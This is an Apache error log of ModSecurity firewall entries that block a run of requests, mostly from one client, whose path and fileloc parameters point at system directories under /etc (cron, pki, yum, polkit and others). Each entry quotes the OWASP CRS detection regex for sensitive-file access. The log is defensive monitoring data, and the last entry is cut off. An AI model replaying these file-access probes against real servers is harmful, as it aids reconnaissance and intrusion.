[Fri Mar 20 11:23:43.584943 2026] [:error] [pid 9818:tid 140411557287680] [client 216.73.216.191:46892] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1Yb11pVZ5mVmJwsFNa6QAAAFY"]
[Fri Mar 20 11:23:43.742978 2026] [:error] [pid 11642:tid 140411658000128] [client 216.73.216.191:46904] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/bashrc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1Yb7ninkcc-iUj5AqJFQAAA4o"]
[Fri Mar 20 11:23:47.009030 2026] [:error] [pid 11642:tid 140411590858496] [client 216.73.216.191:47140] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1Yc7ninkcc-iUj5AqJHwAAA5I"]
[Fri Mar 20 11:23:47.258291 2026] [:error] [pid 7893:tid 140411725141760] [client 57.141.18.117:47154] [client 57.141.18.117] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/rwtab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1YcxCii7xarUs8iHaWSAAAAgI"]
[Fri Mar 20 11:23:47.795559 2026] [:error] [pid 9818:tid 140411674785536] [client 216.73.216.191:47114] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/polkit-1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1Yc11pVZ5mVmJwsFNa7AAAAEg"]
[Fri Mar 20 11:23:48.723362 2026] [:error] [pid 26799:tid 140411708356352] [client 216.73.216.191:47248] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1YdNa6ubjKNq_cu4YGPwAAA0Q"]
[Fri Mar 20 11:23:50.707071 2026] [:error] [pid 9818:tid 140411733534464] [client 216.73.216.191:47284] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1YdV1pVZ5mVmJwsFNa7gAAAEE"]
[Fri Mar 20 11:23:50.754760 2026] [:error] [pid 7235:tid 140411607643904] [client 216.73.216.191:47232] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1YdfqxLDW4GITHUkQWRAAAARA"]
[Fri Mar 20 11:23:52.616079 2026] [:error] [pid 7235:tid 140411725141760] [client 216.73.216.191:47454] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1YePqxLDW4GITHUkQWSgAAAQI"]
[Fri Mar 20 11:23:53.358986 2026] [:error] [pid 15826:tid 140411674785536] [client 216.73.216.191:47506] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/krb5.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1YeeoXxyEfFpUF8f-sMAAAAUg"]
[Fri Mar 20 11:23:53.722047 2026] [:error] [pid 9818:tid 140411691570944] [client 216.73.216.191:47526] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1YeV1pVZ5mVmJwsFNa8QAAAEY"]
[Fri Mar 20 11:23:55.460658 2026] [:error] [pid 21219:tid 140411725141760] [client 216.73.216.191:47534] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1YevXLqtnMIWvjpaLHQAAAAoI"]
[Fri Mar 20 11:23:55.463110 2026] [:error] [pid 9818:tid 140411582465792] [client 216.73.216.191:47588] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1Yel1pVZ5mVmJwsFNa9AAAAFM"]
[Fri Mar 20 11:23:57.102998 2026] [:error] [pid 26799:tid 140411741927168] [client 216.73.216.191:47702] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1Yfda6ubjKNq_cu4YGSQAAA0A"]
[Fri Mar 20 11:23:57.181904 2026] [:error] [pid 11642:tid 140411557287680] [client 216.73.216.191:47708] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/ethertypes"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1Yfbninkcc-iUj5AqJIQAAA5Y"]
[Fri Mar 20 11:23:58.749268 2026] [:error] [pid 9818:tid 140411674785536] [client 216.73.216.191:47718] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/pkcs11"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1YfV1pVZ5mVmJwsFNa-AAAAEg"]
[Fri Mar 20 11:23:58.749284 2026] [:error] [pid 15826:tid 140411607643904] [client 216.73.216.191:47720] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1YfeoXxyEfFpUF8f-sNQAAAVA"]
[Fri Mar 20 11:23:58.750862 2026] [:error] [pid 31215:tid 140411725141760] [client 216.73.216.191:47738] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1YfgF0L0L-SsrnPo6VFAAAAsI"]
[Fri Mar 20 11:23:58.750892 2026] [:error] [pid 26799:tid 140411616036608] [client 216.73.216.191:47736] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1Yfta6ubjKNq_cu4YGSgAAA08"]
[Fri Mar 20 11:23:58.760707 2026] [:error] [pid 9818:tid 140411624429312] [client 216.73.216.191:47672] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1YfV1pVZ5mVmJwsFNa-gAAAE4"]
[Fri Mar 20 11:23:59.087897 2026] [:error] [pid 11642:tid 140411708356352] [client 216.73.216.191:47776] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1Yf7ninkcc-iUj5AqJIwAAA4Q"]
[Fri Mar 20 11:23:59.211933 2026] [:error] [pid 7893:tid 140411691570944] [client 216.73.216.191:47782] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1YfxCii7xarUs8iHaWVgAAAgY"]
[Fri Mar 20 11:24:01.254781 2026] [:error] [pid 21219:tid 140411548894976] [client 216.73.216.191:47826] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1Yf_XLqtnMIWvjpaLHTAAAApc"]
[Fri Mar 20 11:24:01.289799 2026] [:error] [pid 11642:tid 140411674785536] [client 216.73.216.191:47734] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1YgLninkcc-iUj5AqJJQAAA4g"]
[Fri Mar 20 11:24:01.300331 2026] [:error] [pid 7235:tid 140411641214720] [client 216.73.216.191:47852] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1YgfqxLDW4GITHUkQWVQAAAQw"]
[Fri Mar 20 11:24:01.478187 2026] [:error] [pid 26799:tid 140411557287680] [client 216.73.216.191:47856] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1Ygda6ubjKNq_cu4YGTgAAA1Y"]
[Fri Mar 20 11:24:01.732703 2026] [:error] [pid 15826:tid 140411691570944] [client 216.73.216.191:47900] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1YgeoXxyEfFpUF8f-sOgAAAUY"]
[Fri Mar 20 11:24:01.841152 2026] [:error] [pid 26799:tid 140411699963648] [client 216.73.216.191:47904] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/iproute2"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1Ygda6ubjKNq_cu4YGTwAAA0U"]
[Fri Mar 20 11:24:02.277922 2026] [:error] [pid 11642:tid 140411683178240] [client 216.73.216.191:47934] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/wgetrc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1Ygrninkcc-iUj5AqJJgAAA4c"]
[Fri Mar 20 11:24:02.302471 2026] [:error] [pid 21219:tid 140411616036608] [client 216.73.216.191:47940] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/subgid"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id 